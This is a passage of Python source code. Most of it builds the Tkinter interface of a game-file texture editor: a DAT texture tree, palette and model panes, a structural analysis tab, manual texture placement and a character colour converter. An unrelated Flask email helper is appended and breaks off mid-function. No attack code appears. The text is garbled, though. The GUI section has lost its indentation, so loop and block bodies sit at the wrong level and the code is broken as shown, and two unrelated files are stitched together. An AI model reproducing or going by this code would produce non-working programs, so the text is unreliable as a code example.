self.datDestination = Tk.StringVar()
datDestinationLabel1 = ttk.Entry( datTabRow1, textvariable=self.datDestination )
datDestinationLabel1.pack( side='left', fill='x', expand=1, padx=12 )
datDestinationLabel1.bind( '<Return>', openDatDestination )
datTabRow1.pack( fill='x', side='top' )
# DAT tab, row 2 | Frame for the image tree and info pane
datTabRow2 = ttk.Frame( self.datTab, padding="12 0 12 12" ) # Contains the tree and the info pane. Padding order: Left, Top, Right, Bottom.
# File Tree start
datTreeScroller = Tk.Scrollbar( datTabRow2 )
self.datTextureTree = ttk.Treeview( datTabRow2, columns=('texture', 'dimensions', 'type'), yscrollcommand=datTreeScroller.set )
self.datTextureTree.heading('#0', anchor='center', text='Preview')
self.datTextureTree.column('#0', anchor='center', minwidth=104, stretch=0, width=104) # "#0" is implicit in columns definition above.
self.datTextureTree.heading('texture', anchor='center', text='Offset (len)', command=lambda: treeview_sort_column( self.datTextureTree, 'texture', False ))
self.datTextureTree.column('texture', anchor='center', minwidth=80, stretch=0, width=100)
self.datTextureTree.heading('dimensions', anchor='center', text='Dimensions', command=lambda: treeview_sort_column( self.datTextureTree, 'dimensions', False ))
self.datTextureTree.column('dimensions', anchor='center', minwidth=80, stretch=0, width=100)
self.datTextureTree.heading('type', anchor='center', text='Texture Type', command=lambda: treeview_sort_column( self.datTextureTree, 'type', False ))
self.datTextureTree.column('type', anchor='center', minwidth=75, stretch=0, width=100)
self.datTextureTree.pack( fill='both', side='left' )
datTreeScroller.config( command=self.datTextureTree.yview )
datTreeScroller.pack( side='left', fill='y' )
self.datTextureTree.lastLoaded = None # Used by the 'Prev./Next' file loading buttons on the DAT Texture Tree tab
self.datTextureTree.bind( '<<TreeviewSelect>>', onTextureTreeSelect )
self.datTextureTree.bind( "<3>", createTextureTreeContextMenu ) # Summons the right-click context menu.
# Create repositories to store image data (these are used to prevent garbage collected)
self.datTextureTree.fullTextureRenders = {}
self.datTextureTree.textureThumbnails = {}
# Background widgets
self.datTextureTreeBg = Tk.Label( self.datTextureTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.datTextureTreeBg.place(relx=0.5, rely=0.5, anchor='center')
self.datTextureTreeFiltersMsg = ttk.Label( self.datTextureTree, text='Either no textures were found, or you have them filtered out.', background='white' )
# Item highlighting. The order of the configs below reflects (but does not dictate) the priority of their application
self.datTextureTree.tag_configure( 'warn', background='#f6c6d7' ) # light red
self.datTextureTree.tag_configure( 'mipmap', background='#d7e1ff' ) # light blue; same as SA tab 'marked' items
# File Tree end
defaultCanvasDimensions = 258 # Default size for the height and width of the texture viewing canvas. 256 + 1px border
self.imageManipTabs = ttk.Notebook(datTabRow2)#, width=330
self.textureTreeImagePane = Tk.Frame(self.imageManipTabs)
self.imageManipTabs.add( self.textureTreeImagePane, text=' Image ', sticky='nsew' )
canvasOptionsPane = ttk.Frame(self.textureTreeImagePane, padding='0 15 0 0')
ttk.Checkbutton( canvasOptionsPane, command=self.updateCanvasGrid, text='Show Grid', variable=generalBoolSettings['showCanvasGrid'] ).pack(side='left', padx=7)
ttk.Checkbutton( canvasOptionsPane, command=updateCanvasTextureBoundary, text='Show Texture Boundary', variable=generalBoolSettings['showTextureBoundary'] ).pack(side='left', padx=7)
canvasOptionsPane.pack()
self.textureDisplayFrame = Tk.Frame(self.textureTreeImagePane) # The border and highlightthickness for the canvas below must be set to 0, so that the canvas has a proper origin of (0, 0).
self.textureDisplay = Tk.Canvas(self.textureDisplayFrame, width=defaultCanvasDimensions, height=defaultCanvasDimensions, borderwidth=0, highlightthickness=0) #, background='blue'
# alternate dynamic imaging technique: http://stackoverflow.com/questions/3482081/tkinter-label-widget-with-image-update
self.textureDisplay.pack( expand=1 ) # fill='both', padx=10, pady=10
self.updateCanvasGrid()
self.textureDisplay.defaultDimensions = defaultCanvasDimensions
self.textureDisplayFrame.pack( expand=1 )
datPreviewPaneBottomRow = Tk.Frame(self.textureTreeImagePane) # This object uses grid alignment for its children so that they're centered and equally spaced amongst each other.
self.previousDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('previousDatButton') )
self.previousDatButton.grid( column=0, row=0, ipadx=5, pady=(10, 0), sticky='e' )
self.previousDatText = Tk.StringVar()
ToolTip( self.previousDatButton, textvariable=self.previousDatText, delay=300, location='n' )
datFileDetails = ttk.Labelframe( datPreviewPaneBottomRow, text=' File Details ', labelanchor='n' )
self.datFilesizeText = Tk.StringVar()
self.datFilesizeText.set('File Size: ')
ttk.Label(datFileDetails, textvariable=self.datFilesizeText, width=23)
self.totalTextureSpaceText = Tk.StringVar()
self.totalTextureSpaceText.set('Total Texture Size: ')
ttk.Label(datFileDetails, textvariable=self.totalTextureSpaceText)
self.texturesFoundText = Tk.StringVar()
self.texturesFoundText.set('Textures Found: ')
ttk.Label(datFileDetails, textvariable=self.texturesFoundText)
self.texturesFilteredText = Tk.StringVar()
self.texturesFilteredText.set('Filtered Out: ')
ttk.Label(datFileDetails, textvariable=self.texturesFilteredText)
for widget in datFileDetails.winfo_children():
widget.pack( padx=20, pady=0, anchor='w' )
datFileDetails.grid( column=1, row=0 )
self.nextDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('nextDatButton') )
self.nextDatButton.grid( column=2, row=0, ipadx=5, pady=(10, 0), sticky='w' )
self.nextDatText = Tk.StringVar()
ToolTip( self.nextDatButton, textvariable=self.nextDatText, delay=300, location='n' )
datPreviewPaneBottomRow.columnconfigure(0, weight=1)
datPreviewPaneBottomRow.columnconfigure(1, weight=1)
datPreviewPaneBottomRow.columnconfigure(2, weight=1)
datPreviewPaneBottomRow.rowconfigure(0, weight=1)
datPreviewPaneBottomRow.pack(side='bottom', pady=7, fill='x')
# Palette tab
self.palettePane = ttk.Frame( self.imageManipTabs, padding='16 0 0 0' )
self.imageManipTabs.add( self.palettePane, text=' Palette ', state='disabled' )
self.imageManipTabs.bind( '<<NotebookTabChanged>>', self.imageManipTabChanged )
# Left-side column (canvas and bg color changer button)
paletteTabLeftSide = Tk.Frame(self.palettePane)
self.paletteCanvas = Tk.Canvas( paletteTabLeftSide, borderwidth=3, relief='ridge', background='white', width=187, height=405 ) #old height:373
paletteBgColorChanger = ttk.Label( paletteTabLeftSide, text='Change Background Color', foreground='#00F', cursor='hand2' )
self.paletteCanvas.paletteEntries = []
self.paletteCanvas.itemColors = {}
paletteBgColorChanger.bind( '<1>', togglePaletteCanvasColor )
self.paletteCanvas.pack( pady=11, padx=0 )
self.paletteCanvas.entryBorderColor = '#3399ff' # This is the same blue as used for treeview selection highlighting
paletteBgColorChanger.pack()
paletteTabLeftSide.grid( column=0, row=0 )
# Right-side column (palette info)
paletteDetailsFrame = Tk.Frame(self.palettePane)
self.paletteDataText = Tk.StringVar( value='Data Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteDataText ).pack(pady=3)
self.paletteHeaderText = Tk.StringVar( value='Header Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteHeaderText ).pack(pady=3)
self.paletteTypeText = Tk.StringVar( value='Palette Type:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteTypeText ).pack(pady=3)
self.paletteMaxColorsText = Tk.StringVar( value='Max Colors:')
ttk.Label( paletteDetailsFrame, textvariable=self.paletteMaxColorsText ).pack(pady=3)
self.paletteStatedColorsText = Tk.StringVar( value='Stated Colors:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteStatedColorsText ).pack(pady=3)
#self.paletteActualColorsText = Tk.StringVar( value='Actual Colors:' ) # todo:reinstate?
#ttk.Label( paletteDetailsFrame, textvariable=self.paletteActualColorsText ).pack(pady=3)
paletteDetailsFrame.grid( column=1, row=0, pady=60, sticky='n' )
self.palettePane.columnconfigure( 0, weight=1 )
self.palettePane.columnconfigure( 1, weight=2 )
# Add a help button to explain the above
helpText = ( 'Max Colors is the maximum number of colors this texture has space for with its current texture format.\n\n'
'Stated Colors is the number of colors that the palette claims are actually used by the texture (described by the palette data header).\n\n'
'The number of colors actually used may still differ from both of these numbers, especially for very old texture hacks.' )
helpBtn = ttk.Label( self.palettePane, text='?', foreground='#445', cursor='hand2' )
helpBtn.place( relx=1, x=-17, y=18 )
helpBtn.bind( '<1>', lambda e, message=helpText: msg(message, 'Palette Properties') )
# Model parts tab
self.modelPropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.imageManipTabs.add( self.modelPropertiesPane, text='Model', state='disabled' )
self.modelPropertiesPane.interior.imageDataHeaders = []
self.modelPropertiesPane.interior.nonImageDataHeaders = [] # Not expected
self.modelPropertiesPane.interior.textureStructs = [] # Direct model attachments
self.modelPropertiesPane.interior.headerArrayStructs = [] # Used for animations
self.modelPropertiesPane.interior.unexpectedStructs = []
self.modelPropertiesPane.interior.materialStructs = []
self.modelPropertiesPane.interior.displayObjects = []
self.modelPropertiesPane.interior.hideJointChkBtn = None
self.modelPropertiesPane.interior.polyDisableChkBtn = None
self.modelPropertiesPane.interior.opacityEntry = None
self.modelPropertiesPane.interior.opacityBtn = None
self.modelPropertiesPane.interior.opacityScale = None
# Texture properties tab
self.texturePropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.texturePropertiesPane.flagWidgets = [] # Useful for the Flag Decoder to more easily find widgets that need updating
self.imageManipTabs.add( self.texturePropertiesPane, text='Properties', state='disabled' )
self.imageManipTabs.pack( fill='both', expand=1 )
datTabRow2.pack(fill='both', expand=1)
# End of DAT tab row 2, the image tree and info pane.
# Tab 4 | Structural Analysis
self.savTab = ttk.Frame( self.mainTabFrame ) # SAV = Structural Analysis View
self.mainTabFrame.add( self.savTab, text=' Structural Analysis ' )
self.dnd.bindtarget( self.savTab, lambda event: dndHandler( event, 'savTab' ), 'text/uri-list' )
# Create the treeview on the left where structures will be browsed
yScroller = Tk.Scrollbar( self.savTab )
xScroller = Tk.Scrollbar( self.savTab, orient='horizontal' )
self.fileStructureTree = ttk.Treeview( self.savTab, columns='offset', yscrollcommand=yScroller.set, xscrollcommand=xScroller.set, selectmode='extended' )
self.fileStructureTree.heading( '#0', anchor='center' ) # , command=function
self.fileStructureTree.column( '#0', anchor='center', minwidth=200, stretch=True, width=180 ) # "#0" is implicit in the columns definition above.
self.fileStructureTree.heading( 'offset', anchor='center', text='Offset' )
self.fileStructureTree.column( 'offset', anchor='e', minwidth=60, stretch=False, width=76 )
self.fileStructureTree.grid( column=0, row=0, sticky="nsew" )
self.fileStructureTree.tag_configure( 'marked', background='#d7e1ff' ) # light blue; same as mipmap highlight color
# Configure and attach the scrollbars
yScroller.config( command=self.fileStructureTree.yview )
xScroller.config( command=self.fileStructureTree.xview )
yScroller.grid( column=1, row=0, sticky="nsew" )
xScroller.grid( column=0, row=1, columnspan=2, sticky="nsew" )
self.fileStructureTree.yScroller = yScroller
self.fileStructureTree.xScroller = xScroller
# Add treeview event handlers
self.fileStructureTree.bind( '<<TreeviewSelect>>', onStructureTreeSelect )
self.fileStructureTree.bind( '<<TreeviewOpen>>', growStructuralAnalysisTree ) # Occurs when expanding items with children
#self.fileStructureTree.bind( '<Double-1>', onStructureTreeDoubleClick ) # todo: find workaround. some kind of conflict prevents this from working
self.fileStructureTree.bind( "<3>", createStructureTreeContextMenu ) # Right-click
# Create the frame on the right where structure properties will be populated
self.structurePropertiesFrame = VerticalScrolledFrame( self.savTab, width=378 )
self.structurePropertiesFrame.grid( column=2, row=0, sticky="nsew" )
# Configure sizing/resizing behavior of the grid cells
self.savTab.grid_columnconfigure( 0, weight=5 )
self.savTab.grid_columnconfigure( 1, weight=0 )
self.savTab.grid_columnconfigure( 2, weight=1, minsize=378 )
self.savTab.grid_rowconfigure( 0, weight=1 )
# Place the DnD background texture
self.fileStructureTreeBg = Tk.Label( self.fileStructureTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.fileStructureTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
self.fileStructureTree.allIids = []
# Place the search button (and its hover cursor & text)
self.fileStructureTree.searchBtn = Tk.Label( self.fileStructureTree, image=self.imageBank('searchIcon'), bg='white', borderwidth=0, highlightthickness=0 )
self.fileStructureTree.searchBtn.place( rely=1, x=3, y=-6, anchor='sw' )
self.fileStructureTree.searchBtn.bind( '<1>', lambda event: structSearchWindow() )
self.fileStructureTree.searchBtn.config( cursor='hand2' )
ToolTip( self.fileStructureTree.searchBtn, text='Structure Search (CTRL-F)', delay=500 )
self.structPropFrameWrapLength = 300 # The Label wrap length for text inside the structurePropertiesFrame.
# Tab 5 | Manual Texture Replacement
self.mtrTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.mtrTab, text=' Manual Placement ' )
self.dnd.bindtarget( self.mtrTab, lambda event: dndHandler( event, 'mtrTab' ), 'text/uri-list' )
# MTR tab, row 1
mtrTabRow1 = ttk.Frame( self.mtrTab, padding="12 12 12 0" ) # Left, Top, Right, Bottom
ttk.Label( mtrTabRow1, text=" DAT / USD:" ).pack( side='left' )
datDestinationLabel2 = ttk.Entry( mtrTabRow1, textvariable=self.datDestination ) #, font='TkTextFont'
datDestinationLabel2.pack( side='left', fill='x', expand=1, padx=12 )
mtrTabRow1.pack(fill='x', side='top')
# MTR tab, row 2 | Directions
ttk.Label( self.mtrTab, text="This tab gives you the freedom to write a texture into any exact location."
"\nThat even includes any textures that don't normally appear in the DAT Texture Tree."
"\nYou can riffle through the 'Program Usage.txt' file for information on how to use this." ).pack(pady=9)
# MTR tab, row 3 | Texture input
self.mtrTabRow2 = ttk.Frame(self.mtrTab, padding="12 6 0 0") # Left, Top, Right, Bottom
self.sourceTexturesText = Tk.StringVar()
self.sourceTexturesText.set("Texture(s):\n (0 total)")
ttk.Label(self.mtrTabRow2, textvariable=self.sourceTexturesText).pack(side='left') #.grid(column=1, row=1, sticky='ne')
self.imageTextArea = ScrolledText(self.mtrTabRow2, width=74, height=14, wrap='word', font='TkTextFont')
self.imageTextArea.pack(side='left', fill='x', expand=1, padx=12)
self.imageTextArea.bind('<KeyRelease>', onTextAreaKeyUp)
arrowFont = tkFont.Font(family='Courier', size='8', weight='bold')
##self.imageTextArea.tag_config('offsetArrow', foreground='#0066FF', font=arrowFont)
self.imageTextArea.tag_config('offsetArrow', foreground='#119922', font=arrowFont)
self.imageTextArea.tag_config('successfulOverwrite', background='#99FF99', font='TkTextFont')
self.imageTextArea.tag_config('warningOverwrite', background='#FFFF99', font='TkTextFont')
self.imageTextArea.tag_config('failedOverwrite', background='#FF9999', font='TkTextFont')
mtrBtnFrame = ttk.Frame(self.mtrTabRow2, padding=12)
ttk.Button(mtrBtnFrame, text=" Select Textures ", command=importImageFiles).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Scan folder \n structure", command=scanFolderStructure).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Clear Highlighting ", command=clearHighlighting).pack(pady=3)
ttk.Separator(mtrBtnFrame, orient='horizontal').pack(fill='x', padx=6, pady=7)
ttk.Button(mtrBtnFrame, text="Write textures into DAT", command=overwriteImagesManually, width=23).pack(pady=3)
self.mtrSaveBackup = Tk.BooleanVar()
self.mtrSaveBackup.set(1)
ttk.Checkbutton( mtrBtnFrame, text=' Keep a backup of \n the original DAT', variable=self.mtrSaveBackup ).pack()
mtrBtnFrame.pack(side='right')
self.mtrTabRow2.pack(fill='x', anchor='n')
battleFrame = Tk.Frame( self.mtrTab )
ttk.Label( battleFrame, image=self.imageBank('cathedralBattle') ).place( relx=0.5, rely=0.5, anchor='center' )
battleFrame.pack( fill='both', expand=1 )
# Tab 6 | Character Color Converter (CCC)
self.cccTab = ttk.Frame(self.mainTabFrame)
self.mainTabFrame.add(self.cccTab, text=' CCC ')
ttk.Label(self.cccTab, text=' Character Color Converter ', font="-weight bold").pack(pady=23)
cccFileSelectionRow = Tk.Frame(self.cccTab)
ttk.Label(cccFileSelectionRow, text="Step 1 | Choose the source file you'd like to convert." \
"\n\n(If you're on the Disc File Tree, you can right-click \non the file and select 'Set as CCC Source File'.)", wraplength=350).grid(column=0, row=0, padx=15, pady=25)
cccTabRow2RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button(cccTabRow2RightCell, text=' Within a Disc ', command=cccPointToDiscTab).grid(column=0, row=0)
ttk.Button(cccTabRow2RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('source')).grid(column=1, row=0)
self.cccSourceCanvas = Tk.Canvas(cccTabRow2RightCell, width=290, height=64, borderwidth=0, highlightthickness=0)
self.cccIdentifiersXPos = 90
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ')
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 44, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Costume Color: ')
self.cccSourceCanvas.insigniaImage = None
self.cccSourceCanvas.grid(column=0, row=1, columnspan=2, pady=7)
cccTabRow2RightCell.grid(column=1, row=0)
ttk.Label(cccFileSelectionRow, text='Step 2 | Choose a "destination" file of the desired color (and same character). This file will have its texture data replaced with the textures ' \
"from the file above.\nSo make sure you have a back-up of this if you'd like to use it again later.", wraplength=350).grid(column=0, row=1, padx=15, pady=25)
cccTabRow4RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button( cccTabRow4RightCell, text=' Within a Disc ', command=cccPointToDiscTab ).grid( column=0, row=0 )
ttk.Button( cccTabRow4RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('dest') ).grid( column=1, row=0 )
self.cccDestCanvas = Tk.Canvas( cccTabRow4RightCell, width=290, height=64, borderwidth=0, highlightthickness=0 ) #, background='blue'
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ' )
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, 44, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Costume Color: ' )
self.cccDestCanvas.insigniaImage = None
self.cccDestCanvas.grid( column=0, row=1, columnspan=2, pady=7 )
cccTabRow4RightCell.grid( column=1, row=1 )
cccFileSelectionRow.pack( pady=0 )
finalButtonsFrame = Tk.Frame( self.cccTab )
ttk.Button( finalButtonsFrame, text=' Step 3 | Convert! ', command=convertCharacterColor ).pack( side='left', padx=25 )
self.cccOpenConvertedFileButton = ttk.Button( finalButtonsFrame, text=' Open Converted File ', command=openConvertedCharacterFile, state='disabled' )
self.cccOpenConvertedFileButton.pack( side='left', padx=25 )
finalButtonsFrame.pack( pady=12 )
cccBannerFrame = Tk.Frame(self.cccTab)
ttk.Label( cccBannerFrame, image=self.imageBank('cccBanner') ).place(relx=0.5, rely=0.5, anchor='center')
cccBannerFrame.pack( fill='both', expand=1 )
# Set up the Drag-n-drop event handlers.
for widget in cccFileSelectionRow.grid_slaves(row=0): self.dnd.bindtarget(widget, lambda event: dndHandler( event, 'cccTabSource' ), 'text/uri-list')
for widget in cccFileSelectionRow.grid_slaves(row=1): self.dnd.bindtarget(widget, lambda event: dndHandler( event, 'cccTabDest' ), 'text/uri-list')
# Tab 5 | Character Select Screen (CSS)
# cssTab = ttk.Frame(self.mainTabFrame)
# self.mainTabFrame.add(cssTab, text=' CSS ')
# cssEmulator = Tk.Canvas(cssTab, width=320, height=240, borderwidth=0, highlightthickness=0, bg='blue')
# cssEmulator.pack()
# Tab 6 | Texture Search
# searchTab = ttk.Frame( self.mainTabFrame )
# self.mainTabFrame.add( searchTab, text=' Search ' )
self.mainTabFrame.pack( fill='both', expand=1 )
self.mainTabFrame.bind( '<<NotebookTabChanged>>', self.onMainTabChanged )
self.programStatus = Tk.StringVar()
self.programStatus.set( '' ) # for testing position -> | xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |
self.programStatusLabel = Tk.Label( self.root, textvariable=self.programStatus, fg='#000000', anchor='center' )
self.programStatusLabel.place( x=708, anchor='n' )
# End of tabbed interface area
# GUI Rendering complete. Initialize program.
self.root.deiconify() # GUI has been minimized until rendering was complete. This brings it to the foreground
# Bind keyboard shortcuts and the scroll handler
self.root.bind( "<Control-f>", self.searchHandler )
self.root.bind( "<Control-F>", self.searchHandler )
self.root.bind( '<Control-r>', lambda event: runInEmulator() )
self.root.bind( '<Control-R>', lambda event: runInEmulator() )
self.root.bind( '<Control-s>', lambda event: saveChanges() )
self.root.bind( '<Control-S>', lambda event: saveChanges() )
self.root.bind_class( "Text", "<Control-a>", selectAll )
self.root.bind_class( "TEntry", "<Control-a>", selectAll )
# Set up the scroll handler. Unbinding native scroll functionality on some classes to prevent problems when scrolling on top of other widgets
self.root.unbind_class( 'Text', '<MouseWheel>' ) # Allows onMouseWheelScroll below to handle this
self.root.unbind_class( 'Treeview', '<MouseWheel>' ) # Allows onMouseWheelScroll below to handle this
self.root.bind_all( "<MouseWheel>", onMouseWheelScroll )
# The following 4 lines set up an update methodology for updating tkinter GUI elements that's triggered from other processes
self.textureUpdateQueue = None
self.processRenderingPool = None
#self.root.bind( '<<message>>', self.updateTextureThumbnail )
self.thumbnailUpdateJob = None
self.thumbnailUpdateInterval = 300
# The following is used to tell various aspects of the program that it's closing. todo: perhaps better to use this instead of the global variable
#self.shutdownEvent = multiprocessing.Event() # Use multiprocessing.Manager().Queue to reach into separate processes
def searchHandler( self, event ):
    """ Routes CTRL-F key presses according to which main tab is currently selected.
        Only the SAV (structural analysis) tab has a search feature at present. """
    selectedTab = self.root.nametowidget( self.mainTabFrame.select() )
    if selectedTab == self.savTab:
        structSearchWindow()
def imageBank( self, imageName ):
    """ Loads and stores images required by the GUI. This allows all of the images to be
        stored together in a similar manner, and ensures references to all of the loaded
        images are stored, which prevents them from being garbage collected (which would
        otherwise cause them to disappear from the GUI after rendering is complete). The
        images are only loaded when first requested, and then kept for future reference.

        Returns the cached PhotoImage, or None if the file could not be loaded. """
    image = self._imageBank.get( imageName, None )
    if not image: # Hasn't yet been loaded
        imagePath = imagesFolder + "\\" + imageName + ".png"
        try:
            image = self._imageBank[imageName] = ImageTk.PhotoImage( Image.open( imagePath ) )
        except Exception: # Narrowed from a bare except so KeyboardInterrupt/SystemExit still propagate
            msg( 'Unable to load the image, "' + imagePath + '".' )
    return image
def updateMainMenuOptions( self, event ):
    """ This method is used as an efficiency improvement over using the Menu postcommand argument.
        Normally, all postcommand callbacks for all submenus that have one are called when the
        user clicks to expand any one submenu, or even if they only click on the menubar itself,
        when no submenu even needs to be displayed. So this method works to call the callback
        of only one specific submenu when it needs to be displayed. Details here:
        https://stackoverflow.com/questions/55753828/how-can-i-execute-different-callbacks-for-different-tkinter-sub-menus

        Note that event.widget is a tk/tcl path string in this case, rather than a widget instance. """
    # 'index active' returns an int when a submenu is open, or the string 'none' when all are closed
    activeMenuIndex = self.root.call( event.widget, "index", "active" )
    if isinstance( activeMenuIndex, int ):
        activeMenu = self.menubar.winfo_children()[activeMenuIndex]
        # Check if this menu has a repopulate method (in which case it will also have an open attribute), and call it if the menu is open
        if getattr( activeMenu, 'repopulate', None ) and not activeMenu.open:
            # Repopulate the menu's contents
            activeMenu.repopulate()
            activeMenu.open = True # Prevents repopulating again while this menu stays open
    else: # The active menu index is 'none'; all menus are closed, so reset the open state for all of them
        for menuWidget in self.menubar.winfo_children():
            menuWidget.open = False
def updateCanvasGrid( self, saveChange=True ):
    """ Shows/hides the grid behind textures displayed in the DAT Texture Tree's 'Image' tab.

        saveChange: when True, the new 'showCanvasGrid' state is also persisted
                    to the program's settings file. """
    if generalBoolSettings['showCanvasGrid'].get():
        # Grid enabled: give the canvas frame a thin visible border
        self.textureDisplayFrame.config( highlightbackground='#c0c0c0', highlightcolor='#c0c0c0', highlightthickness=1, borderwidth=0, relief='flat' )
        canvasWidth = int( self.textureDisplay['width'] )
        canvasHeight = int( self.textureDisplay['height'] )
        gridImage = self.imageBank( 'canvasGrid' ) # 20x20 px tile; see imageBank for caching
        # Tile the image across the canvas
        for y in xrange(0, canvasHeight + 20, 20): # start, stop, step
            for x in xrange(0, canvasWidth + 20, 20):
                self.textureDisplay.create_image( x, y, image=gridImage, tags='grid' )
        # Make sure any texture present stays above the grid
        if len( self.textureDisplay.find_withtag('texture') ) != 0:
            self.textureDisplay.tag_lower('grid', 'texture')
    else:
        # Remove the grid
        for item in self.textureDisplay.find_withtag('grid'):
            self.textureDisplay.delete( item )
        # Hide the border as well
        self.textureDisplayFrame.config(highlightbackground='#c0c0c0', highlightcolor='#c0c0c0', highlightthickness=0, borderwidth=0, relief='flat')
    if saveChange: # Update the current selection in the settings file.
        with open( settingsFile, 'w') as theSettingsFile:
            settings.set( 'General Settings', 'showCanvasGrid', str(generalBoolSettings['showCanvasGrid'].get()) )
            settings.write( theSettingsFile )
def updateTextureThumbnail( self ):
    """ Only used when multiprocess texture decoding is enabled.
        Updates thumbnail images on the DAT Texture Tree tab once their rendering jobs are completed.
        Rendering is done in separate processes to improve performance, however, GUI updates must all
        be handled by this same thread. The full image data and its thumbnail must be stored (not
        simply attached to the treeview item) to prevent being garbage-collected. """
    textureUnavailableImage = self.imageBank( 'noImage' ) # Fallback shown when decode/thumbnail fails
    currentSelection = Gui.datTextureTree.selection()
    global scanningDat, stopAndScanNewDat
    # Drain every finished render job the worker processes have queued so far
    while not self.textureUpdateQueue.empty():
        textureImage, imageDataOffset = self.textureUpdateQueue.get( block=False )
        if rescanPending(): break
        elif imageDataOffset == -1 and not stopAndScanNewDat: # Indicates that there are no more textures. Can end the update loop for now
            self.thumbnailUpdateJob = None # Clearing this stops the .after() re-queue below
            scanningDat = False
            updateProgramStatus( 'File Scan Complete' )
            #updateGuiOnRenderCompletion() <- This'll be cleaner if I end up needing more here
        else:
            if textureImage:
                # Store the full texture image, and create a 64x64 thumbnail for it
                try:
                    self.datTextureTree.fullTextureRenders[imageDataOffset] = ImageTk.PhotoImage( textureImage )
                    textureImage.thumbnail( (64, 64), Image.ANTIALIAS ) # In-place resize of the PIL image
                    self.datTextureTree.textureThumbnails[imageDataOffset] = ImageTk.PhotoImage( textureImage )
                except: # Problem creating a thumbnail
                    self.datTextureTree.fullTextureRenders[imageDataOffset] = textureUnavailableImage
                    self.datTextureTree.textureThumbnails[imageDataOffset] = textureUnavailableImage
                    print 'Unable to create a thumbnail image for', uHex( 0x20+imageDataOffset )
            else: # Problem during decoding
                self.datTextureTree.fullTextureRenders[imageDataOffset] = textureUnavailableImage
                self.datTextureTree.textureThumbnails[imageDataOffset] = textureUnavailableImage
            # Replace the 'loading...' image in the GUI with the new thumbnail image
            iid = str( imageDataOffset ) # Treeview item ids are the (stringified) image data offsets
            if self.thumbnailUpdateJob and self.datTextureTree.exists( iid ): # Make sure the update loop is still running too
                self.datTextureTree.item( iid, image=self.datTextureTree.textureThumbnails[imageDataOffset] )
                # If the texture being updated is supposed to be displayed in the main display area, update that too
                if currentSelection and currentSelection[-1] == iid: # Only the last item selected is usually displayed
                    drawTextureToMainDisplay( iid )
    # Continue the GUI thumbnail update loop by re-queuing this method
    if self.thumbnailUpdateJob:
        self.thumbnailUpdateJob = self.root.after( self.thumbnailUpdateInterval, self.updateTextureThumbnail )
def onMainTabChanged( self, event ):
    """ This function adjusts the height of rows in the treeview widgets, since the two treeviews can't be individually configured.
        It also starts DAT file structural analysis or image searching when switching to the SA tab or DAT File Tree tab if a DAT file is loaded.
        If an attempt is made to switch to a tab that is already the current tab, this function will not be called. """
    global globalDatFile
    currentTab = self.root.nametowidget( self.mainTabFrame.select() )
    currentTab.focus() # Don't want keyboard/widget focus at any particular place yet
    if currentTab == self.datTab:
        # Tall rows to fit the 64px texture thumbnails
        ttk.Style().configure( 'Treeview', rowheight=76 )
        if globalDatFile and not self.datTextureTree.get_children():
            # May not have been scanned for textures yet (or none were found).
            scanDat()
    else:
        # All other tabs use standard-height rows
        ttk.Style().configure( 'Treeview', rowheight=20 )
        if globalDatFile and currentTab == self.savTab and not self.fileStructureTree.get_children():
            # SAV tab hasn't been populated yet. Perform analysis.
            analyzeDatStructure()
def imageManipTabChanged( self, event ):
    """ Handler for tab switches among the DAT Texture Tree's sub-tabs ('Image', 'Palette', etc.).
        Moves keyboard focus onto the tab frame itself, so that no child widget grabs it. """
    self.root.nametowidget( event.widget.select() ).focus()
# Function & class definitions complete
# Program entry point: builds the GUI, handles drag-and-drop arguments, and starts the event loop.
if __name__ == '__main__':
    #multiprocessing.freeze_support() # Needed in order to compile the program with multiprocessor support
    # Initialize the GUI
    Gui = MainGui()
    #Gui.textureUpdateQueue = multiprocessing.Manager().Queue() # Needs to be enabled if multiprocessor texture decoding is enabled
    # Process any files drag-and-dropped onto the program's .exe file.
    if len( programArgs ) > 1:
        # Filter out texture files.
        # NOTE(review): .png/.tpl arguments are dropped here and not routed to any
        # texture-import handler in this block — confirm that is intended.
        Gui.root.update()
        filepaths = [filepath for filepath in programArgs if not filepath.lower().endswith('.png') and not filepath.lower().endswith('.tpl')]
        fileHandler( filepaths[1:] ) # First item is the main program script or executable (.py/.exe)
    # Start the GUI's mainloop (blocks until the GUI is taken down by .destroy or .quit)
    Gui.root.mainloop()
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
    """Send *msg* from a worker thread. flask_mail requires an application
    context to read the mail configuration, so one is pushed explicitly."""
    with app.app_context():
        mail.send(msg)
def send_email(to, subject, template, **kwargs):
    """Render *template* ('.txt' and '.html' variants) with **kwargs and mail
    it to *to* on a background thread. Returns the Thread so callers can
    join() it if they need to wait for delivery."""
    kwargs['subject'] = subject
    # The real app object is needed (not the proxy) because it crosses threads
    app = current_app._get_current_object()
    config = app.config
    msg = Message(config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
                  sender=config['FLASKY_MAIL_SENDER'], recipients=[to])
    msg.body = render_template(template + '.txt', **kwargs)
